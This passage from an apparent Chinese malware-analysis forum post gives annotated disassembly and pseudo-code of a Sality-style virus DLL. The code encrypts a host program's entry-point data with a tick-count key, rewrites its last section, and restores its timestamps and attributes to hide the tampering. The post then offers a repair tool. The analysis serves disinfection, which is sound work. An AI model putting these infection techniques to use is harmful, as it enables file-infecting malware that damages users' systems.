100029EA . EB 02 JMP SHORT vcmgcd32.100029EE
100029EC >^ EB BE JMP SHORT vcmgcd32.100029AC
100029EE > 6A 04 PUSH 4
100029F0 . 8D55 C4 LEA EDX,DWORD PTR SS:[EBP-3C]
100029F3 . 52 PUSH EDX
100029F4 . 8B85 18FFFFFF MOV EAX,DWORD PTR SS:[EBP-E8]
100029FA . 0385 14FFFFFF ADD EAX,DWORD PTR SS:[EBP-EC]
10002A00 . 8B0D 94E60010 MOV ECX,DWORD PTR DS:[1000E694]
10002A06 . 03C8 ADD ECX,EAX
10002A08 . 51 PUSH ECX
10002A09 . E8 921D0000 CALL vcmgcd32.100047A0
10002A0E . 83C4 0C ADD ESP,0C
10002A11 . FF15 30100010 CALL DWORD PTR DS:[<&KERNEL32.GetTickCount>] ; [GetTickCount
10002A17 . 0345 B8 ADD EAX,DWORD PTR SS:[EBP-48]
10002A1A . 0345 C8 ADD EAX,DWORD PTR SS:[EBP-38]
10002A1D . 6BC0 03 IMUL EAX,EAX,3
10002A20 . 66:8945 B4 MOV WORD PTR SS:[EBP-4C],AX ; Get 随机 加/解密因子
10002A24 . 6A 02 PUSH 2
10002A26 . 8D55 B4 LEA EDX,DWORD PTR SS:[EBP-4C]
10002A29 . 52 PUSH EDX
10002A2A . 8B85 18FFFFFF MOV EAX,DWORD PTR SS:[EBP-E8]
10002A30 . 8B0D 94E60010 MOV ECX,DWORD PTR DS:[1000E694]
10002A36 . 8D5401 77 LEA EDX,DWORD PTR DS:[ECX+EAX+77] ; write 加/解密因子 to 77h position(OEP)
10002A3A . 52 PUSH EDX
10002A3B . E8 601D0000 CALL vcmgcd32.100047A0
10002A40 . 83C4 0C ADD ESP,0C
10002A43 . C785 14FFFFFF>MOV DWORD PTR SS:[EBP-EC],2800 ; decode O_OEP data
10002A4D . C745 C4 00000>MOV DWORD PTR SS:[EBP-3C],0
10002A54 > 8B45 B4 MOV EAX,DWORD PTR SS:[EBP-4C] ; 加/解密因子
10002A57 . 25 FFFF0000 AND EAX,0FFFF
10002A5C . 8B8D 14FFFFFF MOV ECX,DWORD PTR SS:[EBP-EC]
10002A62 . 0FAFC8 IMUL ECX,EAX
10002A65 . 8B95 14FFFFFF MOV EDX,DWORD PTR SS:[EBP-EC]
10002A6B . D1E2 SHL EDX,1
10002A6D . 2BCA SUB ECX,EDX
10002A6F . 8B45 C4 MOV EAX,DWORD PTR SS:[EBP-3C]
10002A72 . 66:8B1445 E89>MOV DX,WORD PTR DS:[EAX*2+100090E8]
10002A7A . 66:33D1 XOR DX,CX
10002A7D . 8B45 C4 MOV EAX,DWORD PTR SS:[EBP-3C]
10002A80 . 66:891445 E89>MOV WORD PTR DS:[EAX*2+100090E8],DX
10002A88 . 8B8D 14FFFFFF MOV ECX,DWORD PTR SS:[EBP-EC]
10002A8E . 83E9 01 SUB ECX,1
10002A91 . 898D 14FFFFFF MOV DWORD PTR SS:[EBP-EC],ECX
10002A97 . 8B55 C4 MOV EDX,DWORD PTR SS:[EBP-3C]
10002A9A . 83C2 01 ADD EDX,1
10002A9D . 8955 C4 MOV DWORD PTR SS:[EBP-3C],EDX
10002AA0 . 83BD 14FFFFFF>CMP DWORD PTR SS:[EBP-EC],0
10002AA7 .^ 75 AB JNZ SHORT vcmgcd32.10002A54
/* 加密算法
dwEC = 0x2800;
dw3C = 0;
LOOP1:
dwEax = dw4C;//加/解密因子
dwEax = dwEax AND 0xFFFF
dwEcx = dwEC;
dwEcx *= dwEax;
dwEdx = dwEC;
dwEdx = dwEdx << 1;
dwEcx -= dwEdx;
dwEax = dw3C;
dwEdx = [100090E8 + dwEax * 2];
dwDx = dwDx XOR dwCX;
dwEax = dw3C;
[100090E8 + dwEax * 2] = dwDx;
dwEcx = dwEC;
dwEcx--;
dwEC = dwEcx;
dwEdx = dw3C;
dw3d++;
dw3C = dwEdx;
if dwEC != 0 then
goto LOOP1;
*/
10002AA9 . 68 00500000 PUSH 5000
10002AAE . 68 E8900010 PUSH vcmgcd32.100090E8
10002AB3 . A1 94E60010 MOV EAX,DWORD PTR DS:[1000E694]
10002AB8 . 0345 C8 ADD EAX,DWORD PTR SS:[EBP-38]
10002ABB . 50 PUSH EAX
10002ABC . E8 DF1C0000 CALL vcmgcd32.100047A0 ; 重写最后一节数据()
10002AC1 . 83C4 0C ADD ESP,0C
10002AC4 > 8B0D 94E60010 MOV ECX,DWORD PTR DS:[1000E694]
10002ACA . 51 PUSH ECX ; /BaseAddress => NULL
10002ACB . FF15 78100010 CALL DWORD PTR DS:[<&KERNEL32.UnmapViewOfFile>] ; \UnmapViewOfFile
10002AD1 . 8B15 10E20010 MOV EDX,DWORD PTR DS:[1000E210]
10002AD7 . 52 PUSH EDX ; /hObject => NULL
10002AD8 . FF15 F4100010 CALL DWORD PTR DS:[<&KERNEL32.CloseHandle>] ; \CloseHandle
10002ADE . 6A 00 PUSH 0 ; /Origin = FILE_BEGIN
10002AE0 . 6A 00 PUSH 0 ; |pOffsetHi = NULL
10002AE2 . 8B45 B0 MOV EAX,DWORD PTR SS:[EBP-50] ; |
10002AE5 . 50 PUSH EAX ; |OffsetLo
10002AE6 . 8B8D 04FFFFFF MOV ECX,DWORD PTR SS:[EBP-FC] ; |
10002AEC . 51 PUSH ECX ; |hFile
10002AED . FF15 88100010 CALL DWORD PTR DS:[<&KERNEL32.SetFilePointer>] ; \SetFilePointer
10002AF3 . 8B95 04FFFFFF MOV EDX,DWORD PTR SS:[EBP-FC]
10002AF9 . 52 PUSH EDX ; /hFile
10002AFA . FF15 84100010 CALL DWORD PTR DS:[<&KERNEL32.SetEndOfFile>] ; \SetEndOfFile
10002B00 . 8D85 1CFFFFFF LEA EAX,DWORD PTR SS:[EBP-E4]
10002B06 . 50 PUSH EAX ; /pLastWrite
10002B07 . 8D4D BC LEA ECX,DWORD PTR SS:[EBP-44] ; |
10002B0A . 51 PUSH ECX ; |pLastAccess
10002B0B . 8D55 D0 LEA EDX,DWORD PTR SS:[EBP-30] ; |
10002B0E . 52 PUSH EDX ; |pCreationTime
10002B0F . 8B85 04FFFFFF MOV EAX,DWORD PTR SS:[EBP-FC] ; |
10002B15 . 50 PUSH EAX ; |hFile
10002B16 . FF15 F8100010 CALL DWORD PTR DS:[<&KERNEL32.SetFileTime>] ; \SetFileTime
10002B1C > 8B8D 04FFFFFF MOV ECX,DWORD PTR SS:[EBP-FC]
10002B22 . 51 PUSH ECX ; /hObject
10002B23 . FF15 F4100010 CALL DWORD PTR DS:[<&KERNEL32.CloseHandle>] ; \CloseHandle
10002B29 . 8B55 D8 MOV EDX,DWORD PTR SS:[EBP-28]
10002B2C . 52 PUSH EDX ; /FileAttributes
10002B2D . 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] ; |
10002B30 . 50 PUSH EAX ; |FileName
10002B31 . FF15 94100010 CALL DWORD PTR DS:[<&KERNEL32.SetFileAttributesA>] ; \SetFileAttributesA
10002B37 . C745 FC FFFFF>MOV DWORD PTR SS:[EBP-4],-1
10002B3E . EB 10 JMP SHORT vcmgcd32.10002B50
10002B40 . B8 01000000 MOV EAX,1
10002B45 . C3 RETN
10002B46 . 8B65 E8 MOV ESP,DWORD PTR SS:[EBP-18]
10002B49 . C745 FC FFFFF>MOV DWORD PTR SS:[EBP-4],-1
10002B50 > 8B45 DC MOV EAX,DWORD PTR SS:[EBP-24]
10002B53 . 25 FF000000 AND EAX,0FF
10002B58 > 8B4D F0 MOV ECX,DWORD PTR SS:[EBP-10]
10002B5B . 64:890D 00000>MOV DWORD PTR FS:[0],ECX
10002B62 . 5F POP EDI
10002B63 . 5E POP ESI
10002B64 . 5B POP EBX
10002B65 . 8BE5 MOV ESP,EBP
10002B67 . 5D POP EBP
10002B68 . C3 RETN
三、修复程序Demo
RepairSalityQ.rar
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)
赞赏
他的文章
看原图
赞赏
雪币:
留言: